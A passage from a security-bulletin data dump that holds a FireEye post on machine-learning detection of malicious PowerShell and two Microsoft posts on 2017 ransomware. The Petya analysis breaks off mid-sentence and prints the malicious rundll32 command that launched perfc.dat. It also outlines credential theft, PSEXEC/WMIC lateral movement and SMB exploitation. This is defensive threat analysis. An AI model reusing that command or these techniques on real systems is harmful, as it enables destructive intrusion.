Detecting Malicious PowerShell****\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was** **synonym, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical token, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predications. \n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field****\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "mmpc": [{"lastseen": "2017-09-08T08:23:33", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kFCG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-06T14:58:36", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-09-06T14:58:36", "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot 